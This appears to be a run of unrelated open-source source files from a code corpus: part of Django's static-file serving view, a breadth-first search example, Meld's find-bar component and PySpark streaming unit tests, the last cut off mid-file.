up with the staticfiles finders, but in the given filesystem path, e.g.::
(r'^(?P<path>.*)$', 'django.contrib.staticfiles.views.serve', {'document_root' : '/path/to/my/files/'})
You may also set ``show_indexes`` to ``True`` if you'd like to serve a
basic index of the directory. This index view will use the
template hardcoded below, but if you'd like to override it, you can create
a template called ``static/directory_index.html``.
"""
if not settings.DEBUG and not insecure:
raise ImproperlyConfigured("The view to serve static files can only "
"be used if the DEBUG setting is True or "
"the --insecure option of 'runserver' is "
"used")
if not document_root:
absolute_path = finders.find(path)
if not absolute_path:
raise Http404('"%s" could not be found' % path)
document_root, path = os.path.split(absolute_path)
# Clean up given path to only allow serving files below document_root.
path = posixpath.normpath(urllib.unquote(path))
path = path.lstrip('/')
newpath = ''
for part in path.split('/'):
if not part:
# Strip empty path components.
continue
drive, part = os.path.splitdrive(part)
head, part = os.path.split(part)
if part in (os.curdir, os.pardir):
# Strip '.' and '..' in path.
continue
newpath = os.path.join(newpath, part).replace('\\', '/')
if newpath and path != newpath:
return HttpResponseRedirect(newpath)
fullpath = os.path.join(document_root, newpath)
if os.path.isdir(fullpath):
if show_indexes:
return directory_index(newpath, fullpath)
raise Http404("Directory indexes are not allowed here.")
if not os.path.exists(fullpath):
raise Http404('"%s" does not exist' % fullpath)
# Respect the If-Modified-Since header.
statobj = os.stat(fullpath)
mimetype, encoding = mimetypes.guess_type(fullpath)
mimetype = mimetype or 'application/octet-stream'
if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'),
statobj[stat.ST_MTIME], statobj[stat.ST_SIZE]):
return HttpResponseNotModified(mimetype=mimetype)
contents = open(fullpath, 'rb').read()
response = HttpResponse(contents, mimetype=mimetype)
response["Last-Modified"] = http_date(statobj[stat.ST_MTIME])
response["Content-Length"] = len(contents)
if encoding:
response["Content-Encoding"] = encoding
return response
DEFAULT_DIRECTORY_INDEX_TEMPLATE = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="NONE,NOARCHIVE" />
<title>Index of {{ directory }}</title>
</head>
<body>
<h1>Index of {{ directory }}</h1>
<ul>
{% ifnotequal directory "/" %}
<li><a href="../">../</a></li>
{% endifnotequal %}
{% for f in file_list %}
<li><a href="{{ f|urlencode }}">{{ f }}</a></li>
{% endfor %}
</ul>
</body>
</html>
"""
def directory_index(path, fullpath):
try:
t = loader.select_template(['static/directory_index.html',
'static/directory_index'])
except TemplateDoesNotExist:
t = Template(DEFAULT_DIRECTORY_INDEX_TEMPLATE, name='Default directory index template')
files = []
for f in os.listdir(fullpath):
if not f.startswith('.'):
if os.path.isdir(os.path.join(fullpath, f)):
f += '/'
files.append(f)
c = Context({
'directory' : path + '/',
'file_list' : files,
})
return HttpResponse(t.render(c))
def was_modified_since(header=None, mtime=0, size=0):
"""
Was something modified since the user last downloaded it?
header
This is the value of the If-Modified-Since header. If this is None,
I'll just return True.
mtime
This is the modification time of the item we're talking about.
size
This is the size of the item we're talking about.
"""
try:
if header is None:
raise ValueError
matches = re.match(r"^([^;]+)(; length=([0-9]+))?$", header,
re.IGNORECASE)
header_mtime = mktime_tz(parsedate_tz(matches.group(1)))
header_len = matches.group(3)
if header_len and int(header_len) != size:
raise ValueError
if mtime > header_mtime:
raise ValueError
except (AttributeError, ValueError, OverflowError):
return True
return False
| mit |
niceandcoolusername/cosmos | code/graph-algorithms/breadth_first_search/breadth_first_search.py | 5 | 1799 | """ Part of Cosmos by OpenGenus Foundation"""
import collections
"""
Wrapper function for the print function.
Used as the default visitFunc for bfs
"""
def visitPrint(i):
print(i)
"""
A class representing a undirected graph of nodes.
An edge can be added between two nodes by calling addEdge
*This class assumes all edge weights are equal
"""
class Graph:
def __init__(self):
self.adjList = collections.defaultdict(set)
def addEdge(self, node1, node2):
self.adjList[node1].add(node2)
self.adjList[node2].add(node1)
"""
Given a 'start' node and a 'graph', call visitFunc
sequentially on the current node, and then its children
and so forth.
When visiting each node, mark it as visited by adding it to the hashmap.
Then queue up all of its children to be visited next.
"""
def bfs(start, graph, visitFunc=visitPrint):
visited = collections.defaultdict(bool)
queue = collections.deque()
queue.append(start)
while(len(queue) > 0):
current = queue.popleft()
if (not visited[current]):
visited[current] = True
visitFunc(current)
for neighbor in graph.adjList[current]:
queue.append(neighbor)
# Testing the breadth first search implementation
if __name__ == "__main__":
# Testing on this tree
# 1
# / \
# / \
# 2 3
# / \ / \
# 4 5 6 7
g = Graph()
g.addEdge(1, 2)
g.addEdge(1, 3)
g.addEdge(2, 4)
g.addEdge(2, 5)
g.addEdge(3, 6)
g.addEdge(3, 7)
print("Test 1:")
bfs(1, g)
print("\nTest2:")
bfs(2, g)
"""Output:
Test 1:
1
2
3
4
5
6
7
Test2:
2
1
4
5
3
6
7
"""
| gpl-3.0 |
McLoo/meld | meld/ui/findbar.py | 4 | 6248 | # Copyright (C) 2002-2009 Stephen Kennedy <stevek@gnome.org>
# Copyright (C) 2012-2014 Kai Willadsen <kai.willadsen@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gi.repository import GtkSource
from meld.ui import gnomeglade
class FindBar(gnomeglade.Component):
def __init__(self, parent):
gnomeglade.Component.__init__(self, "findbar.ui", "findbar",
["arrow_left", "arrow_right"])
self.set_text_view(None)
self.arrow_left.show()
self.arrow_right.show()
parent.connect('set-focus-child', self.on_focus_child)
settings = GtkSource.SearchSettings()
self.match_case.bind_property('active', settings, 'case-sensitive')
self.whole_word.bind_property('active', settings, 'at-word-boundaries')
self.regex.bind_property('active', settings, 'regex-enabled')
self.find_entry.bind_property('text', settings, 'search-text')
settings.set_wrap_around(True)
self.search_settings = settings
def on_focus_child(self, container, widget):
if widget is not None:
visible = self.widget.props.visible
if widget is not self.widget and visible:
self.hide()
return False
def hide(self):
self.set_text_view(None)
self.wrap_box.set_visible(False)
self.widget.hide()
def set_text_view(self, textview):
self.textview = textview
if textview is not None:
self.search_context = GtkSource.SearchContext.new(
textview.get_buffer(), self.search_settings)
self.search_context.set_highlight(True)
else:
self.search_context = None
def start_find(self, textview, text=None):
self.set_text_view(textview)
self.replace_label.hide()
self.replace_entry.hide()
self.hbuttonbox2.hide()
self.find_entry.get_style_context().remove_class("not-found")
if text:
self.find_entry.set_text(text)
self.widget.set_row_spacing(0)
self.widget.show()
self.find_entry.grab_focus()
def start_find_next(self, textview):
self.set_text_view(textview)
if self.find_entry.get_text():
self.on_find_next_button_clicked(self.find_next_button)
else:
self.start_find(self.textview)
def start_find_previous(self, textview, text=None):
self.set_text_view(textview)
if self.find_entry.get_text():
self.on_find_previous_button_clicked(self.find_previous_button)
else:
self.start_find(self.textview)
def start_replace(self, textview, text=None):
self.set_text_view(textview)
self.find_entry.get_style_context().remove_class("not-found")
if text:
self.find_entry.set_text(text)
self.widget.set_row_spacing(6)
self.widget.show_all()
self.find_entry.grab_focus()
self.wrap_box.set_visible(False)
def on_find_next_button_clicked(self, button):
self._find_text()
def on_find_previous_button_clicked(self, button):
self._find_text(backwards=True)
def on_replace_button_clicked(self, entry):
buf = self.textview.get_buffer()
oldsel = buf.get_selection_bounds()
match = self._find_text(0)
newsel = buf.get_selection_bounds()
# Only replace if there is an already-selected match at the cursor
if (match and oldsel and oldsel[0].equal(newsel[0]) and
oldsel[1].equal(newsel[1])):
self.search_context.replace(
newsel[0], newsel[1], self.replace_entry.get_text(), -1)
self._find_text(0)
def on_replace_all_button_clicked(self, entry):
buf = self.textview.get_buffer()
saved_insert = buf.create_mark(
None, buf.get_iter_at_mark(buf.get_insert()), True)
self.search_context.replace_all(self.replace_entry.get_text(), -1)
if not saved_insert.get_deleted():
buf.place_cursor(buf.get_iter_at_mark(saved_insert))
self.textview.scroll_to_mark(
buf.get_insert(), 0.25, True, 0.5, 0.5)
def on_find_entry_changed(self, entry):
self.find_entry.get_style_context().remove_class("not-found")
self._find_text(0)
def _find_text(self, start_offset=1, backwards=False):
assert self.textview
assert self.search_context
buf = self.textview.get_buffer()
insert = buf.get_iter_at_mark(buf.get_insert())
start, end = buf.get_bounds()
self.wrap_box.set_visible(False)
if not backwards:
insert.forward_chars(start_offset)
match, start_iter, end_iter = self.search_context.forward(insert)
if match and (start_iter.get_offset() < insert.get_offset()):
self.wrap_box.set_visible(True)
else:
match, start_iter, end_iter = self.search_context.backward(insert)
if match and (start_iter.get_offset() > insert.get_offset()):
self.wrap_box.set_visible(True)
if match:
buf.place_cursor(start_iter)
buf.move_mark(buf.get_selection_bound(), end_iter)
self.textview.scroll_to_mark(
buf.get_insert(), 0.25, True, 0.5, 0.5)
self.find_entry.get_style_context().remove_class("not-found")
return True
else:
buf.place_cursor(buf.get_iter_at_mark(buf.get_insert()))
self.find_entry.get_style_context().add_class("not-found")
self.wrap_box.set_visible(False)
| gpl-2.0 |
michalsenkyr/spark | python/pyspark/streaming/tests.py | 6 | 63774 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import glob
import os
import sys
from itertools import chain
import time
import operator
import tempfile
import random
import struct
import shutil
from functools import reduce
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
if sys.version >= "3":
long = int
from pyspark.context import SparkConf, SparkContext, RDD
from pyspark.storagelevel import StorageLevel
from pyspark.streaming.context import StreamingContext
from pyspark.streaming.kafka import Broker, KafkaUtils, OffsetRange, TopicAndPartition
from pyspark.streaming.flume import FlumeUtils
from pyspark.streaming.kinesis import KinesisUtils, InitialPositionInStream
from pyspark.streaming.listener import StreamingListener
class PySparkStreamingTestCase(unittest.TestCase):
timeout = 30 # seconds
duration = .5
@classmethod
def setUpClass(cls):
class_name = cls.__name__
conf = SparkConf().set("spark.default.parallelism", 1)
cls.sc = SparkContext(appName=class_name, conf=conf)
cls.sc.setCheckpointDir(tempfile.mkdtemp())
@classmethod
def tearDownClass(cls):
cls.sc.stop()
# Clean up in the JVM just in case there has been some issues in Python API
try:
jSparkContextOption = SparkContext._jvm.SparkContext.get()
if jSparkContextOption.nonEmpty():
jSparkContextOption.get().stop()
except:
pass
def setUp(self):
self.ssc = StreamingContext(self.sc, self.duration)
def tearDown(self):
if self.ssc is not None:
self.ssc.stop(False)
# Clean up in the JVM just in case there has been some issues in Python API
try:
jStreamingContextOption = StreamingContext._jvm.SparkContext.getActive()
if jStreamingContextOption.nonEmpty():
jStreamingContextOption.get().stop(False)
except:
pass
def wait_for(self, result, n):
start_time = time.time()
while len(result) < n and time.time() - start_time < self.timeout:
time.sleep(0.01)
if len(result) < n:
print("timeout after", self.timeout)
def _take(self, dstream, n):
"""
Return the first `n` elements in the stream (will start and stop).
"""
results = []
def take(_, rdd):
if rdd and len(results) < n:
results.extend(rdd.take(n - len(results)))
dstream.foreachRDD(take)
self.ssc.start()
self.wait_for(results, n)
return results
def _collect(self, dstream, n, block=True):
"""
Collect each RDDs into the returned list.
:return: list, which will have the collected items.
"""
result = []
def get_output(_, rdd):
if rdd and len(result) < n:
r = rdd.collect()
if r:
result.append(r)
dstream.foreachRDD(get_output)
if not block:
return result
self.ssc.start()
self.wait_for(result, n)
return result
def _test_func(self, input, func, expected, sort=False, input2=None):
"""
@param input: dataset for the test. This should be list of lists.
@param func: wrapped function. This function should return PythonDStream object.
@param expected: expected output for this testcase.
"""
if not isinstance(input[0], RDD):
input = [self.sc.parallelize(d, 1) for d in input]
input_stream = self.ssc.queueStream(input)
if input2 and not isinstance(input2[0], RDD):
input2 = [self.sc.parallelize(d, 1) for d in input2]
input_stream2 = self.ssc.queueStream(input2) if input2 is not None else None
# Apply test function to stream.
if input2:
stream = func(input_stream, input_stream2)
else:
stream = func(input_stream)
result = self._collect(stream, len(expected))
if sort:
self._sort_result_based_on_key(result)
self._sort_result_based_on_key(expected)
self.assertEqual(expected, result)
def _sort_result_based_on_key(self, outputs):
"""Sort the list based on first value."""
for output in outputs:
output.sort(key=lambda x: x[0])
class BasicOperationTests(PySparkStreamingTestCase):
def test_map(self):
"""Basic operation test for DStream.map."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.map(str)
expected = [list(map(str, x)) for x in input]
self._test_func(input, func, expected)
def test_flatMap(self):
"""Basic operation test for DStream.flatMap."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.flatMap(lambda x: (x, x * 2))
expected = [list(chain.from_iterable((map(lambda y: [y, y * 2], x))))
for x in input]
self._test_func(input, func, expected)
def test_filter(self):
"""Basic operation test for DStream.filter."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.filter(lambda x: x % 2 == 0)
expected = [[y for y in x if y % 2 == 0] for x in input]
self._test_func(input, func, expected)
def test_count(self):
"""Basic operation test for DStream.count."""
input = [range(5), range(10), range(20)]
def func(dstream):
return dstream.count()
expected = [[len(x)] for x in input]
self._test_func(input, func, expected)
def test_slice(self):
"""Basic operation test for DStream.slice."""
import datetime as dt
self.ssc = StreamingContext(self.sc, 1.0)
self.ssc.remember(4.0)
input = [[1], [2], [3], [4]]
stream = self.ssc.queueStream([self.sc.parallelize(d, 1) for d in input])
time_vals = []
def get_times(t, rdd):
if rdd and len(time_vals) < len(input):
time_vals.append(t)
stream.foreachRDD(get_times)
self.ssc.start()
self.wait_for(time_vals, 4)
begin_time = time_vals[0]
def get_sliced(begin_delta, end_delta):
begin = begin_time + dt.timedelta(seconds=begin_delta)
end = begin_time + dt.timedelta(seconds=end_delta)
rdds = stream.slice(begin, end)
result_list = [rdd.collect() for rdd in rdds]
return [r for result in result_list for r in result]
self.assertEqual(set([1]), set(get_sliced(0, 0)))
self.assertEqual(set([2, 3]), set(get_sliced(1, 2)))
self.assertEqual(set([2, 3, 4]), set(get_sliced(1, 4)))
self.assertEqual(set([1, 2, 3, 4]), set(get_sliced(0, 4)))
def test_reduce(self):
"""Basic operation test for DStream.reduce."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.reduce(operator.add)
expected = [[reduce(operator.add, x)] for x in input]
self._test_func(input, func, expected)
def test_reduceByKey(self):
"""Basic operation test for DStream.reduceByKey."""
input = [[("a", 1), ("a", 1), ("b", 1), ("b", 1)],
[("", 1), ("", 1), ("", 1), ("", 1)],
[(1, 1), (1, 1), (2, 1), (2, 1), (3, 1)]]
def func(dstream):
return dstream.reduceByKey(operator.add)
expected = [[("a", 2), ("b", 2)], [("", 4)], [(1, 2), (2, 2), (3, 1)]]
self._test_func(input, func, expected, sort=True)
def test_mapValues(self):
"""Basic operation test for DStream.mapValues."""
input = [[("a", 2), ("b", 2), ("c", 1), ("d", 1)],
[(0, 4), (1, 1), (2, 2), (3, 3)],
[(1, 1), (2, 1), (3, 1), (4, 1)]]
def func(dstream):
return dstream.mapValues(lambda x: x + 10)
expected = [[("a", 12), ("b", 12), ("c", 11), ("d", 11)],
[(0, 14), (1, 11), (2, 12), (3, 13)],
[(1, 11), (2, 11), (3, 11), (4, 11)]]
self._test_func(input, func, expected, sort=True)
def test_flatMapValues(self):
"""Basic operation test for DStream.flatMapValues."""
input = [[("a", 2), ("b", 2), ("c", 1), ("d", 1)],
[(0, 4), (1, 1), (2, 1), (3, 1)],
[(1, 1), (2, 1), (3, 1), (4, 1)]]
def func(dstream):
return dstream.flatMapValues(lambda x: (x, x + 10))
expected = [[("a", 2), ("a", 12), ("b", 2), ("b", 12),
("c", 1), ("c", 11), ("d", 1), ("d", 11)],
[(0, 4), (0, 14), (1, 1), (1, 11), (2, 1), (2, 11), (3, 1), (3, 11)],
[(1, 1), (1, 11), (2, 1), (2, 11), (3, 1), (3, 11), (4, 1), (4, 11)]]
self._test_func(input, func, expected)
def test_glom(self):
"""Basic operation test for DStream.glom."""
input = [range(1, 5), range(5, 9), range(9, 13)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
return dstream.glom()
expected = [[[1, 2], [3, 4]], [[5, 6], [7, 8]], [[9, 10], [11, 12]]]
self._test_func(rdds, func, expected)
def test_mapPartitions(self):
"""Basic operation test for DStream.mapPartitions."""
input = [range(1, 5), range(5, 9), range(9, 13)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
def f(iterator):
yield sum(iterator)
return dstream.mapPartitions(f)
expected = [[3, 7], [11, 15], [19, 23]]
self._test_func(rdds, func, expected)
def test_countByValue(self):
"""Basic operation test for DStream.countByValue."""
input = [list(range(1, 5)) * 2, list(range(5, 7)) + list(range(5, 9)), ["a", "a", "b", ""]]
def func(dstream):
return dstream.countByValue()
expected = [[(1, 2), (2, 2), (3, 2), (4, 2)],
[(5, 2), (6, 2), (7, 1), (8, 1)],
[("a", 2), ("b", 1), ("", 1)]]
self._test_func(input, func, expected, sort=True)
def test_groupByKey(self):
"""Basic operation test for DStream.groupByKey."""
input = [[(1, 1), (2, 1), (3, 1), (4, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1), (2, 1), (3, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1), ("", 1)]]
def func(dstream):
return dstream.groupByKey().mapValues(list)
expected = [[(1, [1]), (2, [1]), (3, [1]), (4, [1])],
[(1, [1, 1, 1]), (2, [1, 1]), (3, [1])],
[("a", [1, 1]), ("b", [1]), ("", [1, 1, 1])]]
self._test_func(input, func, expected, sort=True)
def test_combineByKey(self):
"""Basic operation test for DStream.combineByKey."""
input = [[(1, 1), (2, 1), (3, 1), (4, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1), (2, 1), (3, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1), ("", 1)]]
def func(dstream):
def add(a, b):
return a + str(b)
return dstream.combineByKey(str, add, add)
expected = [[(1, "1"), (2, "1"), (3, "1"), (4, "1")],
[(1, "111"), (2, "11"), (3, "1")],
[("a", "11"), ("b", "1"), ("", "111")]]
self._test_func(input, func, expected, sort=True)
def test_repartition(self):
input = [range(1, 5), range(5, 9)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
return dstream.repartition(1).glom()
expected = [[[1, 2, 3, 4]], [[5, 6, 7, 8]]]
self._test_func(rdds, func, expected)
def test_union(self):
input1 = [range(3), range(5), range(6)]
input2 = [range(3, 6), range(5, 6)]
def func(d1, d2):
return d1.union(d2)
expected = [list(range(6)), list(range(6)), list(range(6))]
self._test_func(input1, func, expected, input2=input2)
def test_cogroup(self):
input = [[(1, 1), (2, 1), (3, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1)]]
input2 = [[(1, 2)],
[(4, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 2)]]
def func(d1, d2):
return d1.cogroup(d2).mapValues(lambda vs: tuple(map(list, vs)))
expected = [[(1, ([1], [2])), (2, ([1], [])), (3, ([1], []))],
[(1, ([1, 1, 1], [])), (2, ([1], [])), (4, ([], [1]))],
[("a", ([1, 1], [1, 1])), ("b", ([1], [1])), ("", ([1, 1], [1, 2]))]]
self._test_func(input, func, expected, sort=True, input2=input2)
def test_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.join(b)
expected = [[('b', (2, 3))]]
self._test_func(input, func, expected, True, input2)
def test_left_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.leftOuterJoin(b)
expected = [[('a', (1, None)), ('b', (2, 3))]]
self._test_func(input, func, expected, True, input2)
def test_right_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.rightOuterJoin(b)
expected = [[('b', (2, 3)), ('c', (None, 4))]]
self._test_func(input, func, expected, True, input2)
def test_full_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.fullOuterJoin(b)
expected = [[('a', (1, None)), ('b', (2, 3)), ('c', (None, 4))]]
self._test_func(input, func, expected, True, input2)
def test_update_state_by_key(self):
def updater(vs, s):
if not s:
s = []
s.extend(vs)
return s
input = [[('k', i)] for i in range(5)]
def func(dstream):
return dstream.updateStateByKey(updater)
expected = [[0], [0, 1], [0, 1, 2], [0, 1, 2, 3], [0, 1, 2, 3, 4]]
expected = [[('k', v)] for v in expected]
self._test_func(input, func, expected)
def test_update_state_by_key_initial_rdd(self):
def updater(vs, s):
if not s:
s = []
s.extend(vs)
return s
initial = [('k', [0, 1])]
initial = self.sc.parallelize(initial, 1)
input = [[('k', i)] for i in range(2, 5)]
def func(dstream):
return dstream.updateStateByKey(updater, initialRDD=initial)
expected = [[0, 1, 2], [0, 1, 2, 3], [0, 1, 2, 3, 4]]
expected = [[('k', v)] for v in expected]
self._test_func(input, func, expected)
def test_failed_func(self):
# Test failure in
# TransformFunction.apply(rdd: Option[RDD[_]], time: Time)
input = [self.sc.parallelize([d], 1) for d in range(4)]
input_stream = self.ssc.queueStream(input)
def failed_func(i):
raise ValueError("This is a special error")
input_stream.map(failed_func).pprint()
self.ssc.start()
try:
self.ssc.awaitTerminationOrTimeout(10)
except:
import traceback
failure = traceback.format_exc()
self.assertTrue("This is a special error" in failure)
return
self.fail("a failed func should throw an error")
def test_failed_func2(self):
# Test failure in
# TransformFunction.apply(rdd: Option[RDD[_]], rdd2: Option[RDD[_]], time: Time)
input = [self.sc.parallelize([d], 1) for d in range(4)]
input_stream1 = self.ssc.queueStream(input)
input_stream2 = self.ssc.queueStream(input)
def failed_func(rdd1, rdd2):
raise ValueError("This is a special error")
input_stream1.transformWith(failed_func, input_stream2, True).pprint()
self.ssc.start()
try:
self.ssc.awaitTerminationOrTimeout(10)
except:
import traceback
failure = traceback.format_exc()
self.assertTrue("This is a special error" in failure)
return
self.fail("a failed func should throw an error")
def test_failed_func_with_reseting_failure(self):
input = [self.sc.parallelize([d], 1) for d in range(4)]
input_stream = self.ssc.queueStream(input)
def failed_func(i):
if i == 1:
# Make it fail in the second batch
raise ValueError("This is a special error")
else:
return i
# We should be able to see the results of the 3rd and 4th batches even if the second batch
# fails
expected = [[0], [2], [3]]
self.assertEqual(expected, self._collect(input_stream.map(failed_func), 3))
try:
self.ssc.awaitTerminationOrTimeout(10)
except:
import traceback
failure = traceback.format_exc()
self.assertTrue("This is a special error" in failure)
return
self.fail("a failed func should throw an error")
class StreamingListenerTests(PySparkStreamingTestCase):
duration = .5
class BatchInfoCollector(StreamingListener):
def __init__(self):
super(StreamingListener, self).__init__()
self.batchInfosCompleted = []
self.batchInfosStarted = []
self.batchInfosSubmitted = []
self.streamingStartedTime = []
def onStreamingStarted(self, streamingStarted):
self.streamingStartedTime.append(streamingStarted.time)
def onBatchSubmitted(self, batchSubmitted):
self.batchInfosSubmitted.append(batchSubmitted.batchInfo())
def onBatchStarted(self, batchStarted):
self.batchInfosStarted.append(batchStarted.batchInfo())
def onBatchCompleted(self, batchCompleted):
self.batchInfosCompleted.append(batchCompleted.batchInfo())
def test_batch_info_reports(self):
batch_collector = self.BatchInfoCollector()
self.ssc.addStreamingListener(batch_collector)
input = [[1], [2], [3], [4]]
def func(dstream):
return dstream.map(int)
expected = [[1], [2], [3], [4]]
self._test_func(input, func, expected)
batchInfosSubmitted = batch_collector.batchInfosSubmitted
batchInfosStarted = batch_collector.batchInfosStarted
batchInfosCompleted = batch_collector.batchInfosCompleted
streamingStartedTime = batch_collector.streamingStartedTime
self.wait_for(batchInfosCompleted, 4)
self.assertEqual(len(streamingStartedTime), 1)
self.assertGreaterEqual(len(batchInfosSubmitted), 4)
for info in batchInfosSubmitted:
self.assertGreaterEqual(info.batchTime().milliseconds(), 0)
self.assertGreaterEqual(info.submissionTime(), 0)
for streamId in info.streamIdToInputInfo():
streamInputInfo = info.streamIdToInputInfo()[streamId]
self.assertGreaterEqual(streamInputInfo.inputStreamId(), 0)
self.assertGreaterEqual(streamInputInfo.numRecords, 0)
for key in streamInputInfo.metadata():
self.assertIsNotNone(streamInputInfo.metadata()[key])
self.assertIsNotNone(streamInputInfo.metadataDescription())
for outputOpId in info.outputOperationInfos():
outputInfo = info.outputOperationInfos()[outputOpId]
self.assertGreaterEqual(outputInfo.batchTime().milliseconds(), 0)
self.assertGreaterEqual(outputInfo.id(), 0)
self.assertIsNotNone(outputInfo.name())
self.assertIsNotNone(outputInfo.description())
self.assertGreaterEqual(outputInfo.startTime(), -1)
self.assertGreaterEqual(outputInfo.endTime(), -1)
self.assertIsNone(outputInfo.failureReason())
self.assertEqual(info.schedulingDelay(), -1)
self.assertEqual(info.processingDelay(), -1)
self.assertEqual(info.totalDelay(), -1)
self.assertEqual(info.numRecords(), 0)
self.assertGreaterEqual(len(batchInfosStarted), 4)
for info in batchInfosStarted:
self.assertGreaterEqual(info.batchTime().milliseconds(), 0)
self.assertGreaterEqual(info.submissionTime(), 0)
for streamId in info.streamIdToInputInfo():
streamInputInfo = info.streamIdToInputInfo()[streamId]
self.assertGreaterEqual(streamInputInfo.inputStreamId(), 0)
self.assertGreaterEqual(streamInputInfo.numRecords, 0)
for key in streamInputInfo.metadata():
self.assertIsNotNone(streamInputInfo.metadata()[key])
self.assertIsNotNone(streamInputInfo.metadataDescription())
for outputOpId in info.outputOperationInfos():
outputInfo = info.outputOperationInfos()[outputOpId]
self.assertGreaterEqual(outputInfo.batchTime().milliseconds(), 0)
self.assertGreaterEqual(outputInfo.id(), 0)
self.assertIsNotNone(outputInfo.name())
self.assertIsNotNone(outputInfo.description())
self.assertGreaterEqual(outputInfo.startTime(), -1)
self.assertGreaterEqual(outputInfo.endTime(), -1)
self.assertIsNone(outputInfo.failureReason())
self.assertGreaterEqual(info.schedulingDelay(), 0)
self.assertEqual(info.processingDelay(), -1)
self.assertEqual(info.totalDelay(), -1)
self.assertEqual(info.numRecords(), 0)
self.assertGreaterEqual(len(batchInfosCompleted), 4)
for info in batchInfosCompleted:
self.assertGreaterEqual(info.batchTime().milliseconds(), 0)
self.assertGreaterEqual(info.submissionTime(), 0)
for streamId in info.streamIdToInputInfo():
streamInputInfo = info.streamIdToInputInfo()[streamId]
self.assertGreaterEqual(streamInputInfo.inputStreamId(), 0)
self.assertGreaterEqual(streamInputInfo.numRecords, 0)
for key in streamInputInfo.metadata():
self.assertIsNotNone(streamInputInfo.metadata()[key])
self.assertIsNotNone(streamInputInfo.metadataDescription())
for outputOpId in info.outputOperationInfos():
outputInfo = info.outputOperationInfos()[outputOpId]
self.assertGreaterEqual(outputInfo.batchTime().milliseconds(), 0)
self.assertGreaterEqual(outputInfo.id(), 0)
self.assertIsNotNone(outputInfo.name())
self.assertIsNotNone(outputInfo.description())
self.assertGreaterEqual(outputInfo.startTime(), 0)
self.assertGreaterEqual(outputInfo.endTime(), 0)
self.assertIsNone(outputInfo.failureReason())
self.assertGreaterEqual(info.schedulingDelay(), 0)
self.assertGreaterEqual(info.processingDelay(), 0)
self.assertGreaterEqual(info.totalDelay(), 0)
self.assertEqual(info.numRecords(), 0)
class WindowFunctionTests(PySparkStreamingTestCase):
timeout = 15
def test_window(self):
input = [range(1), range(2), range(3), range(4), range(5)]
def func(dstream):
return dstream.window(1.5, .5).count()
expected = [[1], [3], [6], [9], [12], [9], [5]]
self._test_func(input, func, expected)
def test_count_by_window(self):
input = [range(1), range(2), range(3), range(4), range(5)]
def func(dstream):
return dstream.countByWindow(1.5, .5)
expected = [[1], [3], [6], [9], [12], [9], [5]]
self._test_func(input, func, expected)
def test_count_by_window_large(self):
input = [range(1), range(2), range(3), range(4), range(5), range(6)]
def func(dstream):
return dstream.countByWindow(2.5, .5)
expected = [[1], [3], [6], [10], [15], [20], [18], [15], [11], [6]]
self._test_func(input, func, expected)
def test_count_by_value_and_window(self):
input = [range(1), range(2), range(3), range(4), range(5), range(6)]
def func(dstream):
return dstream.countByValueAndWindow(2.5, .5)
expected = [[(0, 1)],
[(0, 2), (1, 1)],
[(0, 3), (1, 2), (2, 1)],
[(0, 4), (1, 3), (2, 2), (3, 1)],
[(0, 5), (1, 4), (2, 3), (3, 2), (4, 1)],
[(0, 5), (1, 5), (2, 4), (3, 3), (4, 2), (5, 1)],
[(0, 4), (1, 4), (2, 4), (3, 3), (4, 2), (5, 1)],
[(0, 3), (1, 3), (2, 3), (3, 3), (4, 2), (5, 1)],
[(0, 2), (1, 2), (2, 2), (3, 2), (4, 2), (5, 1)],
[(0, 1), (1, 1), (2, 1), (3, 1), (4, 1), (5, 1)]]
self._test_func(input, func, expected)
def test_group_by_key_and_window(self):
input = [[('a', i)] for i in range(5)]
def func(dstream):
